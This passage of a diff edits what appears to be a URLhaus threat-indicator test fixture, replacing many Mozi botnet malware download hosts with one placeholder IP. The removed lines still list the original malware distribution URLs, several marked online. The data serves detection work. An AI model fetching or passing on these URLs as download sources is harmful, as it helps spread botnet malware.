+ "original": "http://89.160.20.156:52688/Mozi.m",
"scheme": "http",
"port": 52688,
- "domain": "113.87.249.28",
- "full": "http://113.87.249.28:52688/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52688/Mozi.m"
},
- "ip": "113.87.249.28"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693633919Z",
- "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://113.87.249.28:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.87.249.28\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026658100Z",
+ "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://89.160.20.156:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14593,18 +14593,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://112.30.110.63:33782/Mozi.m",
+ "original": "http://89.160.20.156:33782/Mozi.m",
"scheme": "http",
"port": 33782,
- "domain": "112.30.110.63",
- "full": "http://112.30.110.63:33782/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33782/Mozi.m"
},
- "ip": "112.30.110.63"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693637475Z",
- "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://112.30.110.63:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.110.63\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026665Z",
+ "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://89.160.20.156:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14642,18 +14642,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://113.133.225.154:50381/Mozi.m",
+ "original": "http://89.160.20.156:50381/Mozi.m",
"scheme": "http",
"port": 50381,
- "domain": "113.133.225.154",
- "full": "http://113.133.225.154:50381/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50381/Mozi.m"
},
- "ip": "113.133.225.154"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693641343Z",
- "original": "{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://113.133.225.154:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.133.225.154\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026673900Z",
+ "original": "{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://89.160.20.156:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14691,18 +14691,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://123.14.154.78:44219/Mozi.m",
+ "original": "http://89.160.20.156:44219/Mozi.m",
"scheme": "http",
"port": 44219,
- "domain": "123.14.154.78",
- "full": "http://123.14.154.78:44219/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44219/Mozi.m"
},
- "ip": "123.14.154.78"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693644699Z",
- "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://123.14.154.78:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.154.78\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026681Z",
+ "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://89.160.20.156:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14741,18 +14741,18 @@
"url": {
"path": "/bin.sh",
"extension": "sh",
- "original": "http://61.53.42.182:36619/bin.sh",
+ "original": "http://89.160.20.156:36619/bin.sh",
"scheme": "http",
"port": 36619,
- "domain": "61.53.42.182",
- "full": "http://61.53.42.182:36619/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36619/bin.sh"
},
- "ip": "61.53.42.182"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693648406Z",
- "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://61.53.42.182:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"61.53.42.182\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.026688Z",
+ "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://89.160.20.156:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14790,18 +14790,18 @@
"provider": "geenensp",
"url": {
"path": "/i",
- "original": "http://115.58.166.75:59976/i",
+ "original": "http://89.160.20.156:59976/i",
"scheme": "http",
"port": 59976,
- "domain": "115.58.166.75",
- "full": "http://115.58.166.75:59976/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59976/i"
},
- "ip": "115.58.166.75"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693651782Z",
- "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://115.58.166.75:59976/i\",\"url_status\":\"online\",\"host\":\"115.58.166.75\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.026695Z",
+ "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://89.160.20.156:59976/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14839,18 +14839,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://59.92.217.228:48688/Mozi.a",
+ "original": "http://89.160.20.156:48688/Mozi.a",
"scheme": "http",
"port": 48688,
- "domain": "59.92.217.228",
- "full": "http://59.92.217.228:48688/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48688/Mozi.a"
},
- "ip": "59.92.217.228"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693654848Z",
- "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://59.92.217.228:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.92.217.228\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026701900Z",
+ "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://89.160.20.156:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14888,18 +14888,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://221.145.179.219:45682/Mozi.m",
+ "original": "http://89.160.20.156:45682/Mozi.m",
"scheme": "http",
"port": 45682,
- "domain": "221.145.179.219",
- "full": "http://221.145.179.219:45682/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:45682/Mozi.m"
},
- "ip": "221.145.179.219"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693658044Z",
- "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://221.145.179.219:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.145.179.219\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026708700Z",
+ "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://89.160.20.156:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14937,18 +14937,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://59.99.136.49:34922/Mozi.m",
+ "original": "http://89.160.20.156:34922/Mozi.m",
"scheme": "http",
"port": 34922,
- "domain": "59.99.136.49",
- "full": "http://59.99.136.49:34922/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34922/Mozi.m"
},
- "ip": "59.99.136.49"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693661270Z",
- "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://59.99.136.49:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.49\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026715600Z",
+ "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://89.160.20.156:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14986,18 +14986,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://92.54.237.196:37489/Mozi.m",
+ "original": "http://89.160.20.156:37489/Mozi.m",
"scheme": "http",
"port": 37489,
- "domain": "92.54.237.196",
- "full": "http://92.54.237.196:37489/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37489/Mozi.m"
},
- "ip": "92.54.237.196"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693664476Z",
- "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://92.54.237.196:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"92.54.237.196\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026722600Z",
+ "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://89.160.20.156:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15035,18 +15035,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://186.33.104.184:51940/Mozi.m",
+ "original": "http://89.160.20.156:51940/Mozi.m",
"scheme": "http",
"port": 51940,
- "domain": "186.33.104.184",
- "full": "http://186.33.104.184:51940/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51940/Mozi.m"
},
- "ip": "186.33.104.184"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693667903Z",
- "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://186.33.104.184:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.184\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026729600Z",
+ "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://89.160.20.156:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15084,18 +15084,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://59.99.40.58:49599/Mozi.a",
+ "original": "http://89.160.20.156:49599/Mozi.a",
"scheme": "http",
"port": 49599,
- "domain": "59.99.40.58",
- "full": "http://59.99.40.58:49599/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49599/Mozi.a"
},
- "ip": "59.99.40.58"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693671249Z",
- "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://59.99.40.58:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.40.58\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026736500Z",
+ "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://89.160.20.156:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15133,18 +15133,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://59.99.92.249:53436/Mozi.m",
+ "original": "http://89.160.20.156:53436/Mozi.m",
"scheme": "http",
"port": 53436,
- "domain": "59.99.92.249",
- "full": "http://59.99.92.249:53436/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53436/Mozi.m"
},
- "ip": "59.99.92.249"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693674665Z",
- "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://59.99.92.249:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.92.249\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026743400Z",
+ "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://89.160.20.156:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15182,18 +15182,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://58.249.11.35:57237/Mozi.a",
+ "original": "http://89.160.20.156:57237/Mozi.a",
"scheme": "http",
"port": 57237,
- "domain": "58.249.11.35",
- "full": "http://58.249.11.35:57237/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57237/Mozi.a"
},
- "ip": "58.249.11.35"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693679074Z",
- "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://58.249.11.35:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.249.11.35\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026750300Z",
+ "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://89.160.20.156:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15231,18 +15231,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://42.224.251.45:50907/Mozi.m",
+ "original": "http://89.160.20.156:50907/Mozi.m",
"scheme": "http",
"port": 50907,
- "domain": "42.224.251.45",
- "full": "http://42.224.251.45:50907/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50907/Mozi.m"
},
- "ip": "42.224.251.45"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693683522Z",
- "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://42.224.251.45:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.251.45\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026757200Z",
+ "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://89.160.20.156:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15280,18 +15280,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://117.208.134.248:41910/Mozi.m",
+ "original": "http://89.160.20.156:41910/Mozi.m",
"scheme": "http",
"port": 41910,
- "domain": "117.208.134.248",
- "full": "http://117.208.134.248:41910/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41910/Mozi.m"
},
- "ip": "117.208.134.248"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693686868Z",
- "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://117.208.134.248:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.208.134.248\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026764300Z",
+ "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://89.160.20.156:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15329,18 +15329,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://115.55.93.86:57217/Mozi.m",
+ "original": "http://89.160.20.156:57217/Mozi.m",
"scheme": "http",
"port": 57217,
- "domain": "115.55.93.86",
- "full": "http://115.55.93.86:57217/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57217/Mozi.m"
},
- "ip": "115.55.93.86"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693690445Z",
- "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://115.55.93.86:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.93.86\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026771300Z",
+ "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://89.160.20.156:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15378,18 +15378,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://117.196.50.105:47632/Mozi.m",
+ "original": "http://89.160.20.156:47632/Mozi.m",
"scheme": "http",
"port": 47632,
- "domain": "117.196.50.105",
- "full": "http://117.196.50.105:47632/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47632/Mozi.m"
},
- "ip": "117.196.50.105"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693694102Z",
- "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://117.196.50.105:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.196.50.105\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026778200Z",
+ "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://89.160.20.156:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15427,18 +15427,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://116.75.197.63:46654/Mozi.a",
+ "original": "http://89.160.20.156:46654/Mozi.a",
"scheme": "http",
"port": 46654,
- "domain": "116.75.197.63",
- "full": "http://116.75.197.63:46654/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:46654/Mozi.a"
},
- "ip": "116.75.197.63"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693697799Z",
